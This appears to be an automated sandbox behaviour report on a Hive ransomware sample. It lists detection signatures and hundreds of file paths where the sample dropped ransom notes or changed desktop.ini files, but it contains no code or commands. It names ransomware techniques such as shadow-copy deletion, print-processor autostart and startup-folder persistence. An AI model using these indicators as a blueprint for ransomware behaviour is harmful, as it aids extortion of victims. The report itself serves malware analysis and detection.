memory/4052-54-0x0000000000910000-0x0000000000920000-memory.dmp
memory/4052-230-0x0000000000910000-0x0000000000920000-memory.dmp
memory/4052-237-0x0000000000910000-0x0000000000920000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:12
Platform
win7-20240704-en
Max time kernel
1563s
Max time network
1690s
Command Line
Signatures
Detects Go variant of Hive Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Hive
Deletes shadow copies
Drops file in Drivers directory
Boot or Logon Autostart Execution: Print Processors
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\es-ES\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\it-IT\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.-uYcD1toMB6z-bE3g_VWOQ7EUj-WNiccrn6Rqkkqn3Q.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\E9P9LRO9\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OJBRRE9R\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FGBCC7A8\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Hearts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Solitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\Sample Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links for United States\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JVMDVGRW\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\FreeCell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G4UA8T7D\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FH198YO1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Chess\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\Sample Media\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XLI5Q0EH\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnin003.inf_amd64_neutral_3a3c6293d0cda862\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\GroupPolicy\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnca00y.inf_amd64_neutral_64560c72e81f6ad7\Amd64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\es-ES\Licenses\eval\StarterE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\_Default\StarterN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\es-ES\Licenses\eval\HomeBasic\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\wpdfs.inf_amd64_neutral_fc4ebadff3a40ae4\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\es-ES\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\eaphost.inf_amd64_neutral_4506dea11740c089\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\fr\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\es-ES\Licenses\OEM\Enterprise\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\ja-JP\Licenses\eval\EnterpriseE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\ja-JP\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\migration\it-IT\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\spp\tokens\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\LogFiles\SQM\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Tasks\WPD\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnky305.inf_amd64_ja-jp_4d77cc4802b17ec3\Amd64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\de-DE\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\XPSViewer\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\eval\UltimateN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\sysprep\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\XPSViewer\es-ES\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_neutral_4b99fffee061ff26\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\de-DE\Licenses\_Default\Starter\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\smartcrd.inf_amd64_neutral_6fb75ea318f84fe5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Setup\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8TXB0XXK\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\migwiz\dlmanifests\Networking-MPSSVC-Svc\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\com\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\OEM\ProfessionalN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\_Default\HomePremiumN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\migration\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\_Default\HomeBasic\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\en-US\Licenses\_Default\UltimateN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WCN\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmolic.inf_amd64_neutral_a53ac1a125d227fc\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\IME\imekr8\applets\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\Msdtc\Trace\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\eval\ProfessionalN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\fr-FR\Licenses\eval\HomePremium\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\migwiz\PostMigRes\Web\base_images\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnky302.inf_amd64_ja-jp_dd74fe49601b74f6\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
